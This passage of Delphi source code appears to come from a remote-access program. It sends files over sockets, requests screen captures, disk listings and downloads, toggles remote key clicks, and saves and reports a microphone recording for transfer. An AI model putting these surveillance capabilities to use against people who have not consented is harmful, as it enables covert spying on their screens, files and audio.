  ClientText := 'UploadFile;' + ExtractFileName(OpenDialog1.FileName) +
    ';' + IntToStr(GetFileSize(OpenDialog1.FileName)) + #13;
  WaitResponse(WaitConnect2 * 1000);
  if not ConnectReady then begin
    SetStatusBar('Error', 1);
    UploadButton.Enabled := True;
    Exit;
  end;
  FirstWrite := True;
  TransfMode := tmUpload;
  SendFile := TFileStream.Create(OpenDialog1.FileName, fmOpenRead or fmShareDenyNone);
  with ClientSock2 do begin
    SetAddress(ClientSock2, CurrAddr);
    Port := DataPort;
    Open;
  end;
end;

procedure TMainForm.ClientSock2Write(Sender: TObject;
  Socket: TCustomWinSocket);
begin
//  MessageBeep(0);
  case TransfMode of
    tmScreen,
    tmDiskList,
    tmWave,
    tmDownload: ;
    tmUpload: UploadWrite(Sender, Socket);
  end;
end;

procedure TMainForm.UploadWrite(Sender : TObject;
  Socket : TCustomWinSocket);
const
  BuffSize = 4096;
var
  Buff : array[0..BuffSize] of Char;
  StartPos : LongInt;
  AmountInBuf : LongInt;
  AmountSent : Integer;
  ErrorCode : Integer;
begin
  while True do begin
    StartPos := SendFile.Position;
    AmountInBuf := SendFile.Read(Buff, BuffSize);
    if AmountInBuf > 0 then begin
      AmountSent := Socket.SendBuf(Buff, AmountInBuf);
      if (AmountSent = SOCKET_ERROR) then begin
        ErrorCode := WSAGetLastError;
        if (ErrorCode = WSAEWOULDBLOCK) or (ErrorCode = 0) then begin
          SendFile.Position := StartPos;
          Break;
        end else
          Break;
      end
      else if AmountInBuf > AmountSent then
        SendFile.Position := StartPos + (AmountInBuf - AmountSent)
      else if SendFile.Position = SendFile.Size then begin
        ClientSock2.Close;
        Break;
      end;
    end else begin
      ClientSock2.Close;
      Break;
    end;
  end;
  SetStatusBar(IntToStr(Round((SendFile.Position / SendFile.Size) * 100)) +
    '% done', 1);
//  Application.ProcessMessages;
end;

procedure TMainForm.UploadWrite2(Sender : TObject;
  Socket : TCustomWinSocket);
begin
  Socket.SendStreamThenDrop(SendFile);
end;

procedure TMainForm.SoundButtonClick(Sender: TObject);
begin
  SoundForm.Show;
end;

procedure TMainForm.RecordTimerTimer(Sender: TObject);
begin
  RecordTimer.Enabled := False;
  MediaPlayer1.Stop;
  MediaPlayer1.Save;
  MediaPlayer1.Close;
  TransfFile := '';
  TransfMode := tmWave;
  ServerText := 'RecordResponse;2;' + IntToStr(
    GetFileSize(TempPath + 'temp.wav')) + #13;
end;

procedure TMainForm.ClientSock2Connect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  case TransfMode of
    tmScreen,
    tmDiskList,
    tmDownload,
    tmWave: ReceiveMem.Clear;
    tmUpload: ; //
  end;
end;

procedure TMainForm.IntervalEditExit(Sender: TObject);
begin
  WaitTimer.Interval := StrToInt(IntervalEdit.Text) * 1000;
end;

procedure TMainForm.ClickButtonClick(Sender: TObject);
begin
  if ClickButton.Caption = 'Key click' then begin
    ClientText := 'KeyClick;1'#13;
    ClickButton.Caption := 'Restore click';
  end else begin
    ClientText := 'KeyClick;0'#13;
    ClickButton.Caption := 'Key click';
  end;
end;

procedure TMainForm.FormActivate(Sender: TObject);
begin
  FormActivated := True;
end;

function TMainForm.SkipThisFile(FileName : string; IsFile : Boolean) : Boolean;
var
  I : LongInt;
begin
  I := 0;
  Result := False;
  while (I < SkipDirs.Count) and not Result do begin
    if IsFile then
      Result := UpperCase(SkipDirs[I]) = UpperCase(ExtractFilePath(FileName))
    else Result := UpperCase(SkipDirs[I]) = UpperCase(FileName);
    Inc(I);
  end;
end;

procedure TMainForm.FileIterator1AddFile(Sender: TObject;
  const FileName: string; const FileInfo: TFileInfo);
var
  Skip : Boolean;
begin
  Skip := (SkipDirs.Count > 0) and SkipThisFile(FileName, True);
  if not Skip then
    Writeln(DirFile, NumChars(#9, FileIterator1.Level + 1) + ExtractFileName(FileName) +
      ' (' + IntToStr(FileInfo.Size div 1024) + 'k)');
end;

procedure TMainForm.FileIterator1NewDirectory(Sender: TObject;
  const DirName: string);
var
  Temp : string;
  Skip : Boolean;
begin
  if Length(DirName) <= 3 then
    Temp := DirName
  else Temp := ExtractFileName(DirName);
  Skip := (SkipDirs.Count > 0) and SkipThisFile(DirName + '\', False);
  if not Skip then
    Writeln(DirFile, NumChars(#9, FileIterator1.Level) + Temp);
end;

procedure TMainForm.FileIterator1Terminate(Sender: TObject);
begin
  PostMessage(Handle, WM_NEXTSCAN, 0, 0);
end;

end.
